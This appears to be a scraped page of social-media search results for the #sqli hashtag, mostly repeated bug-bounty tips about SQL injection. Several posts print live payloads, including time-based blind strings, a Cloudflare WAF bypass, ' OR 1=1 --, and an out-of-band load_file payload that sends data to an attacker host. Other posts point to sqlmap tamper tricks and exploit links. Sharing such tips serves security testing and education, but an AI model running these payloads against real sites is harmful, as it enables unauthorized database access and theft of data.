#sqli search results
🚨 I found the coolest #SQLi on a target! Surprisingly, the SQLi was in the "ignore cookies" button of the cookie banner. As I always say and do, don’t just look for SQLis in parameters. Check uncommon places like cookie banners, cookie accept buttons, etc. #BugBounty…
Cloudflare 403 bypass to time-based blind SQLi: PL: (select(0)from(select(sleep(10)))v) → 403 but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi #BugBounty #SQLi
Second-Order SQL Injection 1️⃣ Attacker injects payload into a field that is stored in DB (e.g., username). 2️⃣ Later, another query uses this stored value unsafely. 3️⃣ Payload executes → data leak, auth bypass, or privilege escalation. #SQLi #BugBounty #WebSecurity
Cloudflare 403 bypass to time-based blind SQLi: PL: (select(0)from(select(sleep(10)))v) → 403 but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi #BugBounty #SQLi
Discovered a very interesting path based SQLi yesterday. Injected: /‘XOR(if(now()=sysdate(),sleep(8),0))XOR’111/ → No delay /page/‘XOR(if(now()=sysdate(),sleep(8),0))XOR’111/test.test triggered delay. Same payload, different results. Here's why👇 1/4 #BugBounty #SQLi #WebSec
Time-Based Blind SQLi: No errors, no data in response—just time as your oracle. Inject SLEEP() or pg_sleep() to measure delays and confirm injection points. Perfect for Burp Intruder with time diff analysis. Slow… but revealing. 💉 #BugBounty #sqli
Having trouble bypassing filters after finding #SQLInjection? Check out these tricks from @appSecExp that will help you get through them quickly. Have any tips you swear by? Share them with us! #SQLi #hacking #infosec
⚡️SQLi Time Based Payloads ✅Join Telegram to Download- t.me/brutsecurity/1… #sqli #bugbounty #bugbountytips
Exceptional SQLi ✔️ Top 100 overall severity high to exceptional @intigriti ✔️ And this is just the warm-up 🔥 #SQLIMaster #BugBounty #SQLi #InfoSec #CyberSecurity #Leaderboard
Second-Order SQL Injection 1️⃣ Attacker injects payload into a field that is stored in DB (e.g., username). 2️⃣ Later, another query uses this stored value unsafely. 3️⃣ Payload executes → data leak, auth bypass, or privilege escalation. #SQLi #BugBounty #WebSecurity
I've made an Ghauri Command Generator GUI tool. This tool save your time a lot. link h6nt3r.github.io/gcg/ #BugBounty #sqli
GoDaddy SQL Injection Vulnerability..:) Follow Us: youtube.com/@nullsecurityx #BugBounty #Cybersecurity #sqli #Pentesting
Stored-procedure SQLi: If DB allows privileged procedures, chain queries to perform OOB calls or side-effects (e.g., network/cmd execution via safe-redacted proc). Pattern: invoke a safe-redacted proc that performs an outbound action with substituted data. #BugBounty #SQLi
💉 SQL injection bypassing Cloudflare When testing a site, you can bypass Cloudflare's SQL injection protection using sqlmap and a combination of space2comment, between, randomcase tamper scripts. #web #sqli
🔍 Tip for finding SQLi in WordPress plugins: - Study the code—check $wpdb queries & inputs. - Enumerate endpoints, forms, params w/ WPScan or manually. - Test for SQLi w/ payloads like ' OR 1=1 --. 💡 Might lead to a private CVE! Stay ethical #BugBounty #SQLi
Have been here on X providing lots of things I found about #XSS, filter/WAF evasion, #SQLi, even #SSRF and other stuff as @BRuteLogic for the last 13+ yrs. So please don't think I'm just advertising w/ the content I create, I'm just trying to make a living out of my work. Thx.
🚨 MEDIUM severity: CVE-2025-11288 targets CRMEB v5.0–5.6 with a public SQL injection flaw. No patch, vendor silent! Audit your systems & secure endpoints ASAP. 🔍 Details & mitigations: radar.offseq.com/threat/cve-202… #OffSeq #SQLi...
آسیبپذیریهایی مانند #XSS و #SQLi در حال کاهش هستن، در حالیکه نقصهای مربوط به Authorization مانند Improper Access Control و #IDOR بطور قابل توجهی در حال افزایش هستن. در مجموع، در سال ۲۰۲۵ تعداد ۱٬۱۲۱ برنامه #باگبانتی در هکروان شامل حوزهی AI بودن که این رقم ۲۷۰٪ افزایش داشته.
Stored-procedure SQLi: If DB allows privileged procedures, chain queries to perform OOB calls or side-effects (e.g., network/cmd execution via safe-redacted proc). Pattern: invoke a safe-redacted proc that performs an outbound action with substituted data. #BugBounty #SQLi
When your report gets triaged faster than your food delivery 🍕😂 #BugBounty #SQLi #intigriti #CyberSecurity
Blind SQL injection When an app hides query results, attackers extract data via side-channels: boolean-based (true/false) or time-based (delays). Redacted example: IF((SELECT SUBSTRING(secret,1,1)='a'), SLEEP(5),0) Effective against blind/WAFed targets #BugBounty #Infosec #Sqli
"SQL Injection is still dangerous — here are 3 quick ways to stop it: parameterized queries, strict input validation, and proper error handling + monitoring. Protect your app. 🛡️ #AppSec #WebSecurity #SQLi #DevSecOps #CyberSecurity
CVE-2025-11077 (SQL injection): There is a blind SQL injection in the Online Learning Management system via the title POST parameter (boolean/time‑based). Exploit : github.com/byteReaper77/C… #vulnerability #sqlinjection #sqli #blindSQLi #PoC #exploit #CVE
Top 10 web area's to start your hunt with: 1. SQL Injection (#SQLi) 2. Cross-Site Scripting (#XSS) 3. Cross-Site Request Forgery (#CSRF) 4. Insecure Direct Object References (#IDOR) 5. Clickjacking (#Clickjacking)
Top 10 web area's to start your hunt with: 1. SQL Injection (#SQLi) 2. Cross-Site Scripting (#XSS) 3. Cross-Site Request Forgery (#CSRF) 4. Insecure Direct Object References (#IDOR) 5. Clickjacking (#Clickjacking) 6. Command Injection (#CommandInjection) 7. Remote File…
Penetration testing on a TryHackMe web app uncovered open ports, a vulnerable image gallery with SQL injection, and exposed database via backups and hidden files—demonstrating the power of thorough web enumeration and escalation. #SQLi #WebTesting ift.tt/jSqiC6u
💥 De SQLi a RCE – Explotación real paso a paso 📺 youtu.be/WXZEsDVzWUQ ✅ Enumeración completa ✅ HTML Injection + XSS ✅ SQLi clásica ✅ Escalada a RCE real ✅ Mentalidad ofensiva aplicada #BugBounty #SQLi #RCE #HackingEtico #WebSecurity #Pentesting #Ciberseguridad
Cloudflare 403 bypass to time-based blind SQLi: PL: (select(0)from(select(sleep(10)))v) → 403 but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi #BugBounty #SQLi
🚨 I found the coolest #SQLi on a target! Surprisingly, the SQLi was in the "ignore cookies" button of the cookie banner. As I always say and do, don’t just look for SQLis in parameters. Check uncommon places like cookie banners, cookie accept buttons, etc. #BugBounty…
🕵️♂️ P1 Finding of the day: While in wbu, spotted an '/ajax/' in an endpoint. Browsing returned a blank page, so going deep found 2020 archived URL with 2 parameters; still got a blank page. After some efforts crafted my own GET and POST HTTP request. #BugBounty #SQLi 1/n
Discovered a very interesting path based SQLi yesterday. Injected: /‘XOR(if(now()=sysdate(),sleep(8),0))XOR’111/ → No delay /page/‘XOR(if(now()=sysdate(),sleep(8),0))XOR’111/test.test triggered delay. Same payload, different results. Here's why👇 1/4 #BugBounty #SQLi #WebSec
Exceptional SQLi ✔️ Top 100 overall severity high to exceptional @intigriti ✔️ And this is just the warm-up 🔥 #SQLIMaster #BugBounty #SQLi #InfoSec #CyberSecurity #Leaderboard
Cloudflare 403 bypass to time-based blind SQLi: PL: (select(0)from(select(sleep(10)))v) → 403 but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi #BugBounty #SQLi
Second-Order SQL Injection 1️⃣ Attacker injects payload into a field that is stored in DB (e.g., username). 2️⃣ Later, another query uses this stored value unsafely. 3️⃣ Payload executes → data leak, auth bypass, or privilege escalation. #SQLi #BugBounty #WebSecurity
Another SQL Injection #sqli -- Payload: id=1'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z It's a Healthcare Company - Ops! happy to secure SO much patient data & more... #sqli #bugbounty #bugbountytips
Manual testing can be both fun and insightful, especially when you have a error like SQLSTATE[HY000] to guide you, it's a great way to sharpen your skills. Today I did a full manual testing using Burpsuite on a target and got it correct., it was fun.. #BugBounty #SQLi
![nav1n0x's tweet image. Manual testing can be both fun and insightful, especially when you have a error like SQLSTATE[HY000] to guide you, it's a great way to sharpen your skills. Today I did a full manual testing using Burpsuite on a target and got it correct., it was fun.. #BugBounty #SQLi](https://pbs.twimg.com/media/GMQc_KLWUAAeaWT.png)
🧠 Out-of-Band SQLi → Silent Data Leak 1️⃣ Error & time-based SQLi blocked 2️⃣ Payload forces DB to send request: '; SELECT load_file('\\\\attacker(.)com\\leak')-- 3️⃣ Data exfiltrated via DNS/HTTP 🎯 No error, no delay — data leaks quietly #bugbounty #sqli #oob #infosec
Time-Based Blind SQLi: No errors, no data in response—just time as your oracle. Inject SLEEP() or pg_sleep() to measure delays and confirm injection points. Perfect for Burp Intruder with time diff analysis. Slow… but revealing. 💉 #BugBounty #sqli
⚡️SQLi Time Based Payloads ✅Join Telegram to Download- t.me/brutsecurity/1… #sqli #bugbounty #bugbountytips
Do not forget to test 'Newsletter Signup' form for SQLi & stored XSS. This public bb target is on bc since 2022 & has different s/u forms for home page & internal pages, the internal one was vulnerable - probably not being maintained. #BugBounty #SQLi.
Something went wrong.
Something went wrong.
United States Trends
- 1. $ZOOZ N/A
- 2. Knesset 69.5K posts
- 3. Columbus 46.8K posts
- 4. Good Monday 30.5K posts
- 5. #MondayMotivation 10K posts
- 6. #IndigenousPeoplesDay 1,349 posts
- 7. Israeli Parliament 7,135 posts
- 8. #SwiftDay 1,325 posts
- 9. #LingOrmTop1and2EMVDiorSS26 101K posts
- 10. StandX 2,176 posts
- 11. #GalxeID 7,971 posts
- 12. CONGRATS LINGORM PFW EMV 93K posts
- 13. Branch 43.1K posts
- 14. All 20 69K posts
- 15. Cryptocurrencies 4,089 posts
- 16. Rod Wave 2,261 posts
- 17. Victory Monday N/A
- 18. Thanksgiving 38.6K posts
- 19. God Bless President Trump 17.7K posts
- 20. Red Cross 65.9K posts